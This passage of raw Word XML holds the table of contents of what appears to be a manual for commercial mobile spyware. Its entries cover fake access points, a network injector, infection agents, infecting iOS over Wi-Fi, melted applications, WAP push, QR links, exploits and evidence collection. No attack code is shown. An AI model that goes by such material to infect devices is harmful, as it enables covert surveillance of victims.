                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc372642506 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0058357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>56</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7" w:history="1">
            <w:r w:rsidR="003F3DE1" w:rsidRPr="00225343">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Fake Access Point Usage</w:t>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc372642507 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0058357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>57</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508" w:history="1">
            <w:r w:rsidR="003F3DE1" w:rsidRPr="00225343">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Network Injector Appliance (NIA)</w:t>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc372642508 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0058357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>58</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09" w:history="1">
            <w:r w:rsidR="003F3DE1" w:rsidRPr="00225343">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Connecting the Appliance</w:t>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc372642509 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0058357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>58</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510" w:history="1">
            <w:r w:rsidR="003F3DE1" w:rsidRPr="00225343">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Mobile Factories Configuration</w:t>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc372642510 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0058357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>61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11" w:history="1">
            <w:r w:rsidR="003F3DE1" w:rsidRPr="00225343">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Mobile Factories Introduction</w:t>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc372642511 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0058357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>61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12" w:history="1">
            <w:r w:rsidR="003F3DE1" w:rsidRPr="00225343">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Mobile Events Configuration</w:t>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc372642512 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0058357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>63</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13" w:history="1">
            <w:r w:rsidR="003F3DE1" w:rsidRPr="00225343">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Mobile Actions Configuration</w:t>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc372642513 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0058357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>70</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14" w:history="1">
            <w:r w:rsidR="003F3DE1" w:rsidRPr="00225343">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Mobile Modules Configuration</w:t>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc372642514 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0058357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>75</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515" w:history="1">
            <w:r w:rsidR="003F3DE1" w:rsidRPr="00225343">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Mobile Infection Agents</w:t>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc372642515 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0058357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>81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16" w:history="1">
            <w:r w:rsidR="003F3DE1" w:rsidRPr="00225343">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Local Installation Explanation</w:t>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc372642516 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0058357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>82</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17" w:history="1">
            <w:r w:rsidR="003F3DE1" w:rsidRPr="00225343">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Installation Package Explanation</w:t>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc372642517 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0058357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>83</w:t>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="003F3DE1" w:rsidRDefault="003A4380">
          <w:pPr>
            <w:pStyle w:val="Sommario3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc372642518" w:history="1">
            <w:r w:rsidR="003F3DE1" w:rsidRPr="00225343">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>How to: Infect iOS Platform Via Wi-Fi</w:t>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc372642518 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0058357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>84</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19" w:history="1">
            <w:r w:rsidR="003F3DE1" w:rsidRPr="00225343">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Melted Application Explanation</w:t>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc372642519 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0058357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>85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0" w:history="1">
            <w:r w:rsidR="003F3DE1" w:rsidRPr="00225343">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Wap Push Message Explanation</w:t>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc372642520 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0058357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>86</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1" w:history="1">
            <w:r w:rsidR="003F3DE1" w:rsidRPr="00225343">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>QR Code / Web Link Explanation</w:t>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc372642521 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0058357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>87</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2" w:history="1">
            <w:r w:rsidR="003F3DE1" w:rsidRPr="00225343">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Exploit Explanation</w:t>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc372642522 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0058357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>88</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523" w:history="1">
            <w:r w:rsidR="003F3DE1" w:rsidRPr="00225343">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Dashboard and Alerting</w:t>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc372642523 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0058357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>89</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4" w:history="1">
            <w:r w:rsidR="003F3DE1" w:rsidRPr="00225343">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Understanding Evidences</w:t>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc372642524 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0058357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>89</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5" w:history="1">
            <w:r w:rsidR="003F3DE1" w:rsidRPr="00225343">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Data Export, Tagging and Report Creation</w:t>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc372642525 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0058357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>91</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6" w:history="1">
            <w:r w:rsidR="003F3DE1" w:rsidRPr="00225343">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Alerting Events, Types and Auto-Tagging</w:t>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc372642526 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0058357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>93</w:t>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="003F3DE1" w:rsidRDefault="003A4380">
          <w:pPr>
            <w:pStyle w:val="Sommario1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:caps w:val="0"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc372642527" w:history="1">
            <w:r w:rsidR="003F3DE1" w:rsidRPr="00225343">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>System Maintenance</w:t>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc372642527 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0058357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>94</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8" w:history="1">
            <w:r w:rsidR="003F3DE1" w:rsidRPr="00225343">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Backup: Jobs Configuration</w:t>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc372642528 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="003F3DE1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0058357F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>94</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29" w:history="1">
            <w:r w:rsidR="003F3DE1" w:rsidRPr="00225343">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Connectors: Data Export for Third Party Software</w:t>
            </w:r>
            <w:r w:rsidR="003F3DE1">
